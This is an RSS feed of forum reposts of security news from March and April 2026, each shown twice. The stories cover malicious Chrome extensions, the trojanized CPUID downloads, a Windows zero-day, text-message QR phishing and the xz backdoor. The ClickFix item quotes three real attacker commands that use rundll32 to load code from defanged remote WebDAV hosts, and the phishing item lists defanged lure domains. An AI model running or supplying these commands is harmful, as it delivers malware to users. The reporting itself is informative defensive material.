https://www.geeks.fyi/ Mon, 20 Apr 2026 01:42:58 +0000 MyBB https://www.geeks.fyi/showthread.php?tid=21834 Thu, 16 Apr 2026 07:02:59 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21834 Quote:Microsoft has fixed a known issue that caused Windows Server 2019 and 2022 systems to automatically upgrade to Windows Server 2025 without user approval. The solution was confirmed in a Windows release health update on Tuesday, more than a year after the problem was first acknowledged in September 2024. "This issue is resolved and Microsoft has re-enabled the upgrade offer via the Windows Update settings panel," the company stated.

How the Windows Server Upgrade Bug Worked

In September 2024, administrators reported that servers had been automatically upgraded overnight to Windows Server 2025, in some cases to versions for which their organizations did not have licenses. Microsoft said part of the issue was due to third-party update management software that was not configured properly.

Software vendors disagreed, claiming the problem was caused by a procedural error on Microsoft's part, pointing to the speed of the release and how the update was classified. At the time, Microsoft did not offer a detailed explanation of the root cause and did not respond to press inquiries when the issue was first reported.

Continue Reading... ]]> Quote:Microsoft has fixed a known issue that caused Windows Server 2019 and 2022 systems to automatically upgrade to Windows Server 2025 without user approval. The solution was confirmed in a Windows release health update on Tuesday, more than a year after the problem was first acknowledged in September 2024. "This issue is resolved and Microsoft has re-enabled the upgrade offer via the Windows Update settings panel," the company stated.

How the Windows Server Upgrade Bug Worked

In September 2024, administrators reported that servers had been automatically upgraded overnight to Windows Server 2025, in some cases to versions for which their organizations did not have licenses. Microsoft said part of the issue was due to third-party update management software that was not configured properly.

Software vendors disagreed, claiming the problem was caused by a procedural error on Microsoft's part, pointing to the speed of the release and how the update was classified. At the time, Microsoft did not offer a detailed explanation of the root cause and did not respond to press inquiries when the issue was first reported.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21833 Thu, 16 Apr 2026 07:02:00 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21833 Quote:Security researchers at Socket have identified over 100 malicious extensions in the Chrome Web Store that are part of a coordinated campaign. These extensions steal Google OAuth2 Bearer tokens, deploy backdoors, and carry out ad fraud. At the time Socket published its report, all affected extensions were still available in the store. Google has not yet responded to requests for comment.

The extensions were published under five different publisher profiles across various categories, including Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancers, a text translation tool, and browser utilities. Socket found evidence in the code indicating the campaign is tied to a Russian malware-as-a-service operation.

What the Malicious Chrome Extensions Do

The campaign operates with a central backend hosted on a Contabo VPS, supported by multiple subdomains that handle session hijacking, identity collection, command execution, and monetization. The largest cluster involves 78 extensions that inject attacker-controlled HTML into the browser interface using the innerHTML property.

Continue Reading... ]]> Quote:Security researchers at Socket have identified over 100 malicious extensions in the Chrome Web Store that are part of a coordinated campaign. These extensions steal Google OAuth2 Bearer tokens, deploy backdoors, and carry out ad fraud. At the time Socket published its report, all affected extensions were still available in the store. Google has not yet responded to requests for comment.

The extensions were published under five different publisher profiles across various categories, including Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancers, a text translation tool, and browser utilities. Socket found evidence in the code indicating the campaign is tied to a Russian malware-as-a-service operation.

What the Malicious Chrome Extensions Do

The campaign operates with a central backend hosted on a Contabo VPS, supported by multiple subdomains that handle session hijacking, identity collection, command execution, and monetization. The largest cluster involves 78 extensions that inject attacker-controlled HTML into the browser interface using the innerHTML property.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21808 Mon, 13 Apr 2026 10:20:05 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21808 Quote:Hackers accessed a secondary API on the CPUID website between April 9 at 15:00 UTC and April 10 at around 10:00 UTC. During this time, the site served malicious download links instead of legitimate installers for several popular hardware monitoring utilities. CPUID has confirmed the breach and says the compromised API has been fixed. They are now serving clean versions of all affected tools.

Users who downloaded CPU-Z, HWMonitor, HWMonitor Pro, or PerfMonitor during the six-hour period may have received tampered versions. However, CPUID's original signed binaries were not altered.

What Malware Was Delivered Through the CPUID Downloads

The malicious downloads were funneled through Cloudflare R2 storage and delivered a fake HWiNFO installer named HWiNFO_Monitor_Setup, packaged with a Russian Inno Setup wrapper. According to Kaspersky's analysis, the trojanized versions included a legitimately signed executable along with a malicious DLL called CRYPTBASE.dll, which was used for DLL sideloading.

The malicious DLL performed anti-sandbox checks before connecting to a command-and-control server and executing a final payload identified as STX RAT. This remote access trojan has infostealer capabilities and has been documented by researchers at eSentire. The malware operated almost entirely in memory and used techniques to evade endpoint detection and antivirus software.

The four affected software versions were:

• CPU-Z version 2.19
  
• HWMonitor Pro version 1.57
  
• HWMonitor version 1.63
  
• PerfMonitor version 2.04.
  

Continue Reading... ]]> Quote:Hackers accessed a secondary API on the CPUID website between April 9 at 15:00 UTC and April 10 at around 10:00 UTC. During this time, the site served malicious download links instead of legitimate installers for several popular hardware monitoring utilities. CPUID has confirmed the breach and says the compromised API has been fixed. They are now serving clean versions of all affected tools.

Users who downloaded CPU-Z, HWMonitor, HWMonitor Pro, or PerfMonitor during the six-hour period may have received tampered versions. However, CPUID's original signed binaries were not altered.

What Malware Was Delivered Through the CPUID Downloads

The malicious downloads were funneled through Cloudflare R2 storage and delivered a fake HWiNFO installer named HWiNFO_Monitor_Setup, packaged with a Russian Inno Setup wrapper. According to Kaspersky's analysis, the trojanized versions included a legitimately signed executable along with a malicious DLL called CRYPTBASE.dll, which was used for DLL sideloading.

The malicious DLL performed anti-sandbox checks before connecting to a command-and-control server and executing a final payload identified as STX RAT. This remote access trojan has infostealer capabilities and has been documented by researchers at eSentire. The malware operated almost entirely in memory and used techniques to evade endpoint detection and antivirus software.

The four affected software versions were:

• CPU-Z version 2.19
  
• HWMonitor Pro version 1.57
  
• HWMonitor version 1.63
  
• PerfMonitor version 2.04.
  

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21787 Wed, 08 Apr 2026 07:48:54 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21787 Quote:The next Windows Patch Day is just a week away and it is unclear whether it will include a fix for a recently disclosed 0-day vulnerability.

The new security vulnerability has been disclosed on GitHub, including proof of concept code to exploit the issue. However, there is no explanation how the issue works.

Well-known security researcher Will Dormann commented on the issue and confirmed that it is working. He admitted that it “may not be 100%” reliable though. It seems that frustration with MSRC, the Microsoft Security Research Center, and how it operates, was the reason for the public disclosure of the vulnerability. Whether that is true or not can’t be verified though.

So, what do we know about the vulnerability so far?

• What it is: “BlueHammer” is an unpatched zero-day Local Privilege Escalation (LPE) vulnerability affecting Microsoft Windows.
  
• Impact: It allows a local attacker with limited, low-level user access to escalate their permissions to SYSTEM or elevated administrator rights. This effectively grants the attacker full control over the compromised machine.
  
• Current Status: Microsoft has not yet released an official patch or mitigation, making it a true zero-day.
  

Continue Reading... ]]> Quote:The next Windows Patch Day is just a week away and it is unclear whether it will include a fix for a recently disclosed 0-day vulnerability.

The new security vulnerability has been disclosed on GitHub, including proof of concept code to exploit the issue. However, there is no explanation how the issue works.

Well-known security researcher Will Dormann commented on the issue and confirmed that it is working. He admitted that it “may not be 100%” reliable though. It seems that frustration with MSRC, the Microsoft Security Research Center, and how it operates, was the reason for the public disclosure of the vulnerability. Whether that is true or not can’t be verified though.

So, what do we know about the vulnerability so far?

• What it is: “BlueHammer” is an unpatched zero-day Local Privilege Escalation (LPE) vulnerability affecting Microsoft Windows.
  
• Impact: It allows a local attacker with limited, low-level user access to escalate their permissions to SYSTEM or elevated administrator rights. This effectively grants the attacker full control over the compromised machine.
  
• Current Status: Microsoft has not yet released an official patch or mitigation, making it a true zero-day.
  

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21781 Mon, 06 Apr 2026 09:34:41 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21781 Quote:A phishing campaign is targeting residents across multiple US states with fake traffic violation notices delivered by text message, using embedded QR codes to direct victims to sites that steal personal and financial information. The campaign has been reported in New York, California, North Carolina, Illinois, Virginia, Texas, Connecticut, and New Jersey.

The texts include an image of a fabricated court notice rather than a plain link, a change from the toll and parking violation scam texts that circulated widely in 2025. The image format and embedded QR code are used to make the phishing infrastructure harder for automated security tools and researchers to detect and analyze.

How the Traffic Violation QR Code Scam Operates

The fake notices impersonate state courts, with one example claiming to be from the "Criminal Court of the City of New York." The message states that an unpaid parking or toll violation has entered formal enforcement and instructs the recipient to scan a QR code to settle the balance.

Scanning the QR code leads to an intermediary page requiring a CAPTCHA to proceed. Completing the CAPTCHA redirects to a second site impersonating a state DMV or related agency. In all examples reviewed by BleepingComputer, the stated outstanding balance is $6.99.

Phishing sites impersonating the New York DMV have used hostnames including "ny.gov-skd[.]org" and "ny.ofkhv[.]life."

Proceeding past the balance screen presents a form requesting name, address, phone number, email address, and credit card details. That data is collected by the attacker and can be used for financial fraud, identity theft, follow-on phishing, or sale to other threat actors.

Continue Reading... ]]> Quote:A phishing campaign is targeting residents across multiple US states with fake traffic violation notices delivered by text message, using embedded QR codes to direct victims to sites that steal personal and financial information. The campaign has been reported in New York, California, North Carolina, Illinois, Virginia, Texas, Connecticut, and New Jersey.

The texts include an image of a fabricated court notice rather than a plain link, a change from the toll and parking violation scam texts that circulated widely in 2025. The image format and embedded QR code are used to make the phishing infrastructure harder for automated security tools and researchers to detect and analyze.

How the Traffic Violation QR Code Scam Operates

The fake notices impersonate state courts, with one example claiming to be from the "Criminal Court of the City of New York." The message states that an unpaid parking or toll violation has entered formal enforcement and instructs the recipient to scan a QR code to settle the balance.

Scanning the QR code leads to an intermediary page requiring a CAPTCHA to proceed. Completing the CAPTCHA redirects to a second site impersonating a state DMV or related agency. In all examples reviewed by BleepingComputer, the stated outstanding balance is $6.99.

Phishing sites impersonating the New York DMV have used hostnames including "ny.gov-skd[.]org" and "ny.ofkhv[.]life."

Proceeding past the balance screen presents a form requesting name, address, phone number, email address, and credit card details. That data is collected by the attacker and can be used for financial fraud, identity theft, follow-on phishing, or sale to other threat actors.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21700 Tue, 31 Mar 2026 08:58:17 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21700 Quote:Google has officially moved its advanced ransomware detection and file restoration features for Google Drive out of beta, making them generally available to organizations globally.

Originally launched for beta testing in September 2025, these security enhancements are designed to minimize the destructive impact of malware attacks on both personal and corporate endpoints.



The Admin console setting for ransomware detection (Source: Google)The general availability release brings massive upgrades to Google’s threat detection engine.

Powered by an updated AI model, the system now identifies 14 times more infections than the previous beta version.



The Admin console setting for Drive file restoration  (Source: Google)It recognizes a much wider variety of modern ransomware encryption methods and detects malicious behavior significantly faster, providing comprehensive protection against rapidly evolving threat actors.

Continue Reading... ]]> Quote:Google has officially moved its advanced ransomware detection and file restoration features for Google Drive out of beta, making them generally available to organizations globally.

Originally launched for beta testing in September 2025, these security enhancements are designed to minimize the destructive impact of malware attacks on both personal and corporate endpoints.



The Admin console setting for ransomware detection (Source: Google)The general availability release brings massive upgrades to Google’s threat detection engine.

Powered by an updated AI model, the system now identifies 14 times more infections than the previous beta version.



The Admin console setting for Drive file restoration  (Source: Google)It recognizes a much wider variety of modern ransomware encryption methods and detects malicious behavior significantly faster, providing comprehensive protection against rapidly evolving threat actors.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21699 Tue, 31 Mar 2026 08:57:18 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21699 Quote:A new variant of the ClickFix attack technique that shifts execution away from commonly monitored tools like PowerShell and mshta, instead abusing native Windows components such as rundll32.exe and WebDAV.

This evolution allows attackers to bypass traditional script-based detection mechanisms, increasing the likelihood of a successful, stealthy compromise.

The attack begins similarly to earlier ClickFix campaigns. Victims are lured to a phishing website disguised as a CAPTCHA page, such as “healthybyhillary[.]com.”

The CyberProof Threat Research Team has observed a new variant of the ClickFix technique, where attackers manipulate the user into executing a malicious command on their own device through the Win + R shortcut. 


Phishing Website (Source : CyberProof).

The page instructs users to open the Windows Run dialog using “Win + R,” paste a command, and press Enter. This social engineering trick convinces users to execute malicious commands themselves.

Observed commands include:

• rundll32.exe \ser-fluxa[.]omnifree[.]in[.]net@80\verification.
  
• rundll32.exe \data-x7-sync.neurosync[.]in[.]net@80\verification.
  
• rundll32.exe \mer-forgea.sightup[.]in[.]net@80\verification.
  

These commands leverage the Windows WebDAV mini-redirector using the \server@port syntax. This allows remote files hosted over HTTP (port 80) to be accessed like local network shares.

Continue Reading... ]]> Quote:A new variant of the ClickFix attack technique that shifts execution away from commonly monitored tools like PowerShell and mshta, instead abusing native Windows components such as rundll32.exe and WebDAV.

This evolution allows attackers to bypass traditional script-based detection mechanisms, increasing the likelihood of a successful, stealthy compromise.

The attack begins similarly to earlier ClickFix campaigns. Victims are lured to a phishing website disguised as a CAPTCHA page, such as “healthybyhillary[.]com.”

The CyberProof Threat Research Team has observed a new variant of the ClickFix technique, where attackers manipulate the user into executing a malicious command on their own device through the Win + R shortcut. 


Phishing Website (Source : CyberProof).

The page instructs users to open the Windows Run dialog using “Win + R,” paste a command, and press Enter. This social engineering trick convinces users to execute malicious commands themselves.

Observed commands include:

• rundll32.exe \ser-fluxa[.]omnifree[.]in[.]net@80\verification.
  
• rundll32.exe \data-x7-sync.neurosync[.]in[.]net@80\verification.
  
• rundll32.exe \mer-forgea.sightup[.]in[.]net@80\verification.
  

These commands leverage the Windows WebDAV mini-redirector using the \server@port syntax. This allows remote files hosted over HTTP (port 80) to be accessed like local network shares.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21692 Fri, 27 Mar 2026 11:28:09 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21692 Quote:Red Hat has issued an urgent security alert regarding a highly sophisticated supply chain attack targeting the popular xz compression utility.

Cybersecurity researchers discovered malicious code embedded within recent versions of the xz libraries, which could potentially grant threat actors unauthorised remote access to affected Linux systems.

Technical Analysis of the Exploit

• The vulnerability is tracked as CVE-2024-3094.
  
• Compromised tools include the general-purpose data compression formats xz and xz-libs.
  
• Malicious code is actively present in versions 5.6.0 and 5.6.1.
  
• Security teams recommend reverting to the safe 5.4.x releases.
  
• Affected distributions currently include Fedora Rawhide, Fedora 40 Beta, Debian unstable (Sid), and openSUSE.
  
• The primary threat involves unauthorized remote system access via an SSH bypass.
  

The xz utility is a fundamental data compression format utilized across nearly every community and commercial Linux distribution to manage large file transfers.

The malicious injection specifically targets versions 5.6.0 and 5.6.1 of the libraries. Threat actors heavily obfuscated the payload, ensuring the complete exploit is only assembled within the official download package.

Continue Reading... ]]> Quote:Red Hat has issued an urgent security alert regarding a highly sophisticated supply chain attack targeting the popular xz compression utility.

Cybersecurity researchers discovered malicious code embedded within recent versions of the xz libraries, which could potentially grant threat actors unauthorised remote access to affected Linux systems.

Technical Analysis of the Exploit

• The vulnerability is tracked as CVE-2024-3094.
  
• Compromised tools include the general-purpose data compression formats xz and xz-libs.
  
• Malicious code is actively present in versions 5.6.0 and 5.6.1.
  
• Security teams recommend reverting to the safe 5.4.x releases.
  
• Affected distributions currently include Fedora Rawhide, Fedora 40 Beta, Debian unstable (Sid), and openSUSE.
  
• The primary threat involves unauthorized remote system access via an SSH bypass.
  

The xz utility is a fundamental data compression format utilized across nearly every community and commercial Linux distribution to manage large file transfers.

The malicious injection specifically targets versions 5.6.0 and 5.6.1 of the libraries. Threat actors heavily obfuscated the payload, ensuring the complete exploit is only assembled within the official download package.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21681 Mon, 23 Mar 2026 11:03:40 +0000 schreckdeividas]]> https://www.geeks.fyi/showthread.php?tid=21681 Quote:The internet you use every day could soon be dominated by artificial intelligence. Cloudflare CEO Matthew Prince says that AI bots may generate more traffic than humans within the next year or two, marking a major shift in how the web works.

Speaking about the current trends with TechCrunch, Prince said bot activity is growing rapidly as AI systems crawl and interact with websites at scale.

Before the rise of generative AI, bots were responsible for only 20% of internet traffic. Most of that traffic came from search engines like Google, and some malicious activity. Now, that number is climbing much faster.
Source----@digitaltrends]]> Quote:The internet you use every day could soon be dominated by artificial intelligence. Cloudflare CEO Matthew Prince says that AI bots may generate more traffic than humans within the next year or two, marking a major shift in how the web works.

Speaking about the current trends with TechCrunch, Prince said bot activity is growing rapidly as AI systems crawl and interact with websites at scale.

Before the rise of generative AI, bots were responsible for only 20% of internet traffic. Most of that traffic came from search engines like Google, and some malicious activity. Now, that number is climbing much faster.
Source----@digitaltrends]]> https://www.geeks.fyi/showthread.php?tid=21670 Thu, 19 Mar 2026 10:56:49 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21670 Quote:Google has taken down the Chrome extension "Save Image as Type" after security researchers uncovered it had been hijacked and altered to redirect user traffic for affiliate commission fraud. The extension had over a million users when it was removed.

The compromise was carried out by a group called Karma, which reportedly acquired the extension from its original developer sometime between November 13 and November 29, 2025, according to XDA Developers. By the end of November, new code had been inserted to intercept purchases made through retailers such as Amazon, Adidas, and Shein, enabling the attackers to collect affiliate commissions from transactions made by affected users.

What the Malicious Chrome Extension Code Did



The injected code secretly redirected user traffic in the background, without any obvious signs in the browser. This meant that users browsing and buying from supported retail sites had their sessions altered to credit Karma's affiliate accounts.

Despite this malicious activity, the extension continued to function normally as an image conversion tool, making it difficult to detect. Google took down the extension earlier in March 2026, but the harmful version had probably been active for several weeks before it was removed.

Continue Reading... ]]> Quote:Google has taken down the Chrome extension "Save Image as Type" after security researchers uncovered it had been hijacked and altered to redirect user traffic for affiliate commission fraud. The extension had over a million users when it was removed.

The compromise was carried out by a group called Karma, which reportedly acquired the extension from its original developer sometime between November 13 and November 29, 2025, according to XDA Developers. By the end of November, new code had been inserted to intercept purchases made through retailers such as Amazon, Adidas, and Shein, enabling the attackers to collect affiliate commissions from transactions made by affected users.

What the Malicious Chrome Extension Code Did



The injected code secretly redirected user traffic in the background, without any obvious signs in the browser. This meant that users browsing and buying from supported retail sites had their sessions altered to credit Karma's affiliate accounts.

Despite this malicious activity, the extension continued to function normally as an image conversion tool, making it difficult to detect. Google took down the extension earlier in March 2026, but the harmful version had probably been active for several weeks before it was removed.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21663 Tue, 17 Mar 2026 11:59:11 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21663 Quote:Threat actors were already abusing URL rewriting mechanisms in phishing campaigns to mask malicious domains.

URL rewriting is designed to protect users by replacing original links with security-vendor URLs that scan destinations at click time.

These rewritten links route traffic through the provider’s infrastructure so they can analyze the page in real time, block known malicious sites, and log user activity for administrators. In normal operation, this is a defensive layer that helps filter out obviously bad destinations.​

Threat actors, however, are turning this model on its head. By operating from compromised mailboxes that already use URL rewriting, they generate “pre-wrapped” safe links and then reuse those trusted-domain URLs in external phishing campaigns.

Example of an original phishing link (Source : LevelBlue

SpiderLabs).The end result is a phishing link that visually and technically appears to belong to a reputable security or productivity provider, even though it eventually leads to a credential-harvesting site.

From late 2024 into 2025, LevelBlue SpiderLabs observed a sharp rise in multi-layered URL rewriting chains, where attackers nest multiple already‑rewritten links together.

Continue Reading... ]]> Quote:Threat actors were already abusing URL rewriting mechanisms in phishing campaigns to mask malicious domains.

URL rewriting is designed to protect users by replacing original links with security-vendor URLs that scan destinations at click time.

These rewritten links route traffic through the provider’s infrastructure so they can analyze the page in real time, block known malicious sites, and log user activity for administrators. In normal operation, this is a defensive layer that helps filter out obviously bad destinations.​

Threat actors, however, are turning this model on its head. By operating from compromised mailboxes that already use URL rewriting, they generate “pre-wrapped” safe links and then reuse those trusted-domain URLs in external phishing campaigns.

Example of an original phishing link (Source : LevelBlue

SpiderLabs).The end result is a phishing link that visually and technically appears to belong to a reputable security or productivity provider, even though it eventually leads to a credential-harvesting site.

From late 2024 into 2025, LevelBlue SpiderLabs observed a sharp rise in multi-layered URL rewriting chains, where attackers nest multiple already‑rewritten links together.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21662 Tue, 17 Mar 2026 11:57:09 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21662 Quote:Instagram has confirmed it will remove end-to-end encryption from direct messages on May 8, 2026. The change was detailed in an updated Instagram Help Center page titled "What is end-to-end encryption on Instagram," first reported by PiunikaWeb. Some users received an in-app notification about the change when opening Instagram.

Meta has not published a statement explaining the decision.

Instagram Messages Will No Longer Be End-to-End Encrypted

End-to-end encryption ensures that only the sender and recipient can read messages, preventing third parties (including the platform itself) from accessing the content.

Once the change takes effect, Instagram DMs will no longer have this protection, meaning conversations could potentially be accessed or reviewed by the company or other authorized parties. The announcement has quickly sparked debate online, with many users expressing concerns about losing a key privacy feature.

Continue Reading... ]]> Quote:Instagram has confirmed it will remove end-to-end encryption from direct messages on May 8, 2026. The change was detailed in an updated Instagram Help Center page titled "What is end-to-end encryption on Instagram," first reported by PiunikaWeb. Some users received an in-app notification about the change when opening Instagram.

Meta has not published a statement explaining the decision.

Instagram Messages Will No Longer Be End-to-End Encrypted

End-to-end encryption ensures that only the sender and recipient can read messages, preventing third parties (including the platform itself) from accessing the content.

Once the change takes effect, Instagram DMs will no longer have this protection, meaning conversations could potentially be accessed or reviewed by the company or other authorized parties. The announcement has quickly sparked debate online, with many users expressing concerns about losing a key privacy feature.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21643 Tue, 10 Mar 2026 10:19:36 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21643 Quote:A wave of phishing campaigns that used signed malware posing as popular workplace apps like Microsoft Teams, Zoom, and Adobe Reader to deploy remote monitoring and management (RMM) backdoors.

The activity, attributed to an as-yet unidentified threat actor, highlights how trusted branding and valid-looking digital signatures can be abused to gain stealthy, long-term access in enterprise networks.

According to Microsoft, the campaigns relied on convincing phishing emails that spoofed common workplace themes such as meeting invitations, invoices, project bids, and internal notifications.

In February 2026, Microsoft Defender Experts identified multiple phishing campaigns attributed to an unknown threat actor.

Messages either attached counterfeit PDFs or embedded links that redirected users to attacker-controlled download pages closely mimicking legitimate Adobe, Teams, or Zoom portals.

Victims were encouraged to “update” or “open” documents via prominent buttons and prompts, which instead delivered Windows executables masquerading as trusted apps, including msteams.exe, trustconnectagent.exe, adobereader.exe, zoomworkspace.clientsetup.exe, and invite.exe.

Continue Reading... ]]> Quote:A wave of phishing campaigns that used signed malware posing as popular workplace apps like Microsoft Teams, Zoom, and Adobe Reader to deploy remote monitoring and management (RMM) backdoors.

The activity, attributed to an as-yet unidentified threat actor, highlights how trusted branding and valid-looking digital signatures can be abused to gain stealthy, long-term access in enterprise networks.

According to Microsoft, the campaigns relied on convincing phishing emails that spoofed common workplace themes such as meeting invitations, invoices, project bids, and internal notifications.

In February 2026, Microsoft Defender Experts identified multiple phishing campaigns attributed to an unknown threat actor.

Messages either attached counterfeit PDFs or embedded links that redirected users to attacker-controlled download pages closely mimicking legitimate Adobe, Teams, or Zoom portals.

Victims were encouraged to “update” or “open” documents via prominent buttons and prompts, which instead delivered Windows executables masquerading as trusted apps, including msteams.exe, trustconnectagent.exe, adobereader.exe, zoomworkspace.clientsetup.exe, and invite.exe.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21642 Sun, 08 Mar 2026 17:10:56 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21642 Quote:Apparently AI can accelerate both attacks and defenses in computer security
 
The takeaway: While some companies are struggling with a flood of unreliable or hallucinated AI-generated bug reports, Mozilla is finding real value in bug-seeking bots. The foundation has begun working with Anthropic to strengthen Firefox's security, and several AI-assisted bug fixes have already landed in the browser's codebase.
 
Mozilla is now working with Anthropic's Frontier Red Team to identify and patch potentially dangerous security vulnerabilities in Firefox. According to Mozilla, the AI company approached them a few weeks ago with results from a newly developed, AI-assisted bug-hunting method. The approach appears to work, Mozilla said, and could ultimately lead to a safer Firefox experience for everyone.
 
Anthropic's team focused on Firefox's JavaScript engine, in part because the Red Panda browser offers a widely used and "deeply scrutinized" open-source codebase that makes it ideal for testing new analysis techniques. The AI system uncovered several security flaws in the JS engine and also produced minimal test cases, allowing Firefox developers to quickly verify and reproduce the issues.

Continue Reading... ]]> Quote:Apparently AI can accelerate both attacks and defenses in computer security
 
The takeaway: While some companies are struggling with a flood of unreliable or hallucinated AI-generated bug reports, Mozilla is finding real value in bug-seeking bots. The foundation has begun working with Anthropic to strengthen Firefox's security, and several AI-assisted bug fixes have already landed in the browser's codebase.
 
Mozilla is now working with Anthropic's Frontier Red Team to identify and patch potentially dangerous security vulnerabilities in Firefox. According to Mozilla, the AI company approached them a few weeks ago with results from a newly developed, AI-assisted bug-hunting method. The approach appears to work, Mozilla said, and could ultimately lead to a safer Firefox experience for everyone.
 
Anthropic's team focused on Firefox's JavaScript engine, in part because the Red Panda browser offers a widely used and "deeply scrutinized" open-source codebase that makes it ideal for testing new analysis techniques. The AI system uncovered several security flaws in the JS engine and also produced minimal test cases, allowing Firefox developers to quickly verify and reproduce the issues.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21633 Wed, 04 Mar 2026 16:54:02 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21633 Quote:Security researchers say a powerful iPhone hacking framework once tied to surveillance operations is now being used in criminal campaigns to steal cryptocurrency and sensitive data from users.

The exploit kit, known as Coruna, reportedly contains multiple exploit chains capable of compromising vulnerable iPhones through malicious websites.

Hackers Target WebKit and Older iOS Versions

According to analysis from Google Threat Intelligence Group and mobile security company iVerify, the framework includes:

• Five full exploit chains
  
• 23 known iOS vulnerabilities
  
• Techniques that bypass several Apple security protections
  

The attacks target WebKit, the browser engine used by all iOS browsers. That means simply visiting a malicious web page could compromise devices running older iOS builds.

Once triggered, the exploit chain escalates privileges from the browser to kernel-level access, allowing attackers to install malware with root permissions.

Continue Reading... ]]> Quote:Security researchers say a powerful iPhone hacking framework once tied to surveillance operations is now being used in criminal campaigns to steal cryptocurrency and sensitive data from users.

The exploit kit, known as Coruna, reportedly contains multiple exploit chains capable of compromising vulnerable iPhones through malicious websites.

Hackers Target WebKit and Older iOS Versions

According to analysis from Google Threat Intelligence Group and mobile security company iVerify, the framework includes:

• Five full exploit chains
  
• 23 known iOS vulnerabilities
  
• Techniques that bypass several Apple security protections
  

The attacks target WebKit, the browser engine used by all iOS browsers. That means simply visiting a malicious web page could compromise devices running older iOS builds.

Once triggered, the exploit chain escalates privileges from the browser to kernel-level access, allowing attackers to install malware with root permissions.

Continue Reading... ]]>